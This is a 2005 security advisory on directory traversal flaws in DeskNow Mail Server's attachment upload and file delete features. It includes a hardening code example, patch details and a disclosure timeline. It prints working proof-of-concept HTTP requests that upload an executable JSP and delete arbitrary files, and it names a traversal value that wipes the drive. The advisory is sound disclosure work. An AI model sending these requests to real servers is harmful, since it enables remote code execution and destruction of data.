SIG^2 Vulnerability Research Advisory

DeskNow Mail and Collaboration Server Directory Traversal Vulnerabilities

by Tan Chew Keong
Release Date: 02 Feb 2005

Summary

DeskNow Mail and Collaboration Server is a full-featured and integrated mail and instant messaging server, with webmail, secure instant messaging, document repository, shared calendars, address books, message boards, web-publishing, anti-spam features, Palm and PocketPC access and much more.

A directory traversal vulnerability was found in the DeskNow webmail file attachment upload feature that may be exploited to upload files to arbitrary locations on the server. A malicious webmail user may upload a JSP file to the script directory of the server and execute it by requesting the URL of the uploaded JSP file. A second directory traversal vulnerability exists in the document repository file delete feature. This vulnerability may be exploited to delete arbitrary files on the server.

 
Tested System

DeskNow Mail and Collaboration Server Version 2.5.12 on English Win2K SP4.

 
Details

On the Windows platform, the default installation of DeskNow Mail and Collaboration Server runs its webmail service under the Tomcat Application Server with LOCAL SYSTEM privilege. This advisory documents two directory traversal vulnerabilities that may be exploited by a malicious webmail user to upload files to, or delete files from, arbitrary directories.

 
1. Insufficient input sanitization in attachment.do allows file upload to arbitrary directories.

DeskNow's webmail allows a logged-on mail user to upload file attachments when composing an email. Lack of sanitization of the AttachmentsKey input parameter allows the user to upload files to arbitrary locations on the server. In particular, the value of the AttachmentsKey parameter is used to create a temporary directory where the uploaded file attachment will be saved. This directory name is relative to the directory C:\desknowdata\userfolders\temp\username\

It is possible to use directory traversal characters to cause the uploaded file attachment to be saved outside the temporary directory. This may be exploited by a malicious webmail user to upload JSP files to the script execution directory of the server. After uploading the JSP file, it is possible to execute that file by directly requesting its URL (e.g. http://[hostname]/desknow/jsp/test/poc.jsp). Successful exploitation allows upload and execution of arbitrary JSP code with LOCAL SYSTEM privilege; for example, a malicious user may upload a JSP file that gives him/her a reverse shell.

A sample malicious file upload HTTP request is shown below.

POST /desknow/attachment.do?Action=Upload&
     AttachmentsKey=../../../../../program%20files/desknow/webapps/desknow/jsp/test&Rnd=1019edc8ec1 HTTP/1.0
Host: localhost
Cookie: JSESSIONID=C4A8E16807E2CA492B0146CD0FF40FD0
Content-Type: multipart/form-data; boundary=---------------------------114782935826962
Content-Length: 226
Connection: Close

-----------------------------114782935826962
Content-Disposition: form-data; name="file1"; filename="p.jsp"
Content-Type: application/octet-stream

<%
out.write("Test");
%>
-----------------------------114782935826962--

When the user logs out, or when he/she next logs in, all files and directories within the directory specified by the AttachmentsKey parameter are recursively deleted. If the malicious user sets the AttachmentsKey parameter to ../../../../../../../, the entire drive will be recursively DELETED when the user logs out or next logs in.

 
2. Insufficient input sanitization in file.do allows deletion of arbitrary files.

DeskNow's document repository feature allows a user to store files on the server via the web interface. A user is allowed to delete his/her own files. When the user selects one of his/her own files for deletion, the file name is sent in the select_file parameter of a POST request to file.do. It is possible to use directory traversal characters within this parameter to delete files that do not belong to the user.

A sample malicious file delete HTTP request is shown below.

POST /desknow/file.do?Action=DeleteGroup&IDFolder=102&Rnd=1019eea9da3 HTTP/1.0
Host: localhost
Cookie: JSESSIONID=54CDDCDFD228B0BEEE98D97A51CDD218
Content-Type: application/x-www-form-urlencoded
Content-Length: 166
Connection: Close

select1=0&select_file=../../../../../data/test.txt&IDFolderDest=0&select2=0&
select=file.do%3FAction%3DViewFolder%26IDFolder%3D102%26BlockSize%3D15%26Rnd%3D1019eea9da3
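Both vulnerabilities above have the same root cause: a user-supplied path fragment (AttachmentsKey in section 1, select_file in section 2) is joined to a per-user base directory without checking that the result still lies inside that directory. The following is an added example, not DeskNow's code, of the containment check a hardened handler would apply before saving an upload, before the recursive cleanup at logout/login, and before a repository delete. It uses Python's ntpath module so Windows path rules apply regardless of the host OS; the upload base is the one quoted in the advisory, the repository base (REPO_ROOT), the username, the attachment key "attach_7f3a" and the in-memory file store are all constructed for the example.

```python
import ntpath
from typing import Dict, Optional

# Per-user temporary attachment root quoted in the advisory (Windows install).
TEMP_ROOT = r"C:\desknowdata\userfolders\temp"
# The advisory does not name the document repository directory; this is a
# placeholder used only by this example.
REPO_ROOT = r"C:\desknowdata\repository_PLACEHOLDER"


def resolve_within(base: str, user_path: str) -> Optional[str]:
    """Join user_path under base and return the normalized absolute path, or
    None if it escapes base or resolves to base itself. ntpath is used on
    purpose so '\\' and '/', drive letters and case-insensitivity are handled
    the way the Windows file system would handle them."""
    base_norm = ntpath.normpath(base)
    # Join first, then collapse every '..' so the containment test sees the
    # path the file system would actually use.
    candidate = ntpath.normpath(ntpath.join(base_norm, user_path))
    try:
        common = ntpath.commonpath([base_norm, candidate])
    except ValueError:
        return None  # different drive letter, e.g. 'D:\evil'
    if ntpath.normcase(common) != ntpath.normcase(base_norm):
        return None  # walked out of the base directory
    if ntpath.normcase(candidate) == ntpath.normcase(base_norm):
        return None  # strictly inside only; never operate on base itself
    return candidate


class InMemoryStore:
    """Constructed stand-in for the server file system: normalized path -> bytes."""

    def __init__(self) -> None:
        self.files: Dict[str, bytes] = {}

    def put(self, path: str, data: bytes) -> None:
        self.files[ntpath.normcase(path)] = data

    def has(self, path: str) -> bool:
        return ntpath.normcase(path) in self.files


def upload_attachment(store: InMemoryStore, username: str, attachments_key: str,
                      filename: str, data: bytes) -> bool:
    """Hardened equivalent of attachment.do?Action=Upload: AttachmentsKey must
    stay inside the user's temp folder, and the multipart filename is reduced
    to its basename because it is attacker-controlled as well."""
    target_dir = resolve_within(ntpath.join(TEMP_ROOT, username), attachments_key)
    if target_dir is None:
        return False
    safe_name = ntpath.basename(filename)
    if safe_name in ("", ".", ".."):
        return False
    store.put(ntpath.join(target_dir, safe_name), data)
    return True


def purge_temp_folder(store: InMemoryStore, username: str, attachments_key: str) -> int:
    """The logout/login cleanup described in the advisory, gated by the same
    check so a traversing key cannot aim the recursive delete at the drive.
    Returns the number of files removed."""
    target_dir = resolve_within(ntpath.join(TEMP_ROOT, username), attachments_key)
    if target_dir is None:
        return 0
    prefix = ntpath.normcase(target_dir) + ntpath.sep
    victims = [p for p in store.files if p.startswith(prefix)]
    for p in victims:
        del store.files[p]
    return len(victims)


def delete_repository_file(store: InMemoryStore, username: str, select_file: str) -> bool:
    """Hardened equivalent of file.do?Action=DeleteGroup: select_file may only
    name a file under the user's own repository folder."""
    target = resolve_within(ntpath.join(REPO_ROOT, username), select_file)
    if target is None:
        return False
    return store.files.pop(ntpath.normcase(target), None) is not None


if __name__ == "__main__":
    store = InMemoryStore()
    store.put(r"C:\data\test.txt", b"constructed victim file")
    # Legitimate upload is accepted; the advisory's traversing key is refused.
    print(upload_attachment(store, "username", "attach_7f3a", "p.jsp", b"<% out.write(\"Test\"); %>"))
    print(upload_attachment(store, "username",
                            "../../../../../program files/desknow/webapps/desknow/jsp/test", "p.jsp", b"x"))
    # Drive-wide purge attempt removes nothing; the real temp folder is cleaned.
    print(purge_temp_folder(store, "username", "../../../../../../../"))
    print(purge_temp_folder(store, "username", "attach_7f3a"))
    # Deleting outside the user's repository is refused.
    print(delete_repository_file(store, "username", "../../../../../data/test.txt"))
```

The check is applied to the fully normalized path rather than by scanning the input for "..", so mixed separators, a legitimate ".." that stays inside the base, and a different drive letter are all handled by one rule. Apply it at every place the parameter is consumed: the cleanup at logout/login is a second consumer of AttachmentsKey and is the step that turns the upload bug into a drive-wide delete.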

 
Patch

  1. Upgrade to DeskNow Mail and Collaboration Server Version 2.5.14 or later.

 
Disclosure Timeline

23 Jan 05 - Vulnerability Discovered.
24 Jan 05 - Initial Vendor Notification.
24 Jan 05 - Initial Vendor Reply.
25 Jan 05 - Vendor Released Version 2.5.13.
25 Jan 05 - Informed Vendor that Vulnerability is not Fully Fixed.
27 Jan 05 - Vendor Released Fixed Version 2.5.14.
02 Feb 05 - Public Release.

 

Contacts

For further questions and enquiries, email the following.

Overall-in-charge: Tan Chew Keong


Updated: 02/02/2005
webmaster@security.org.sg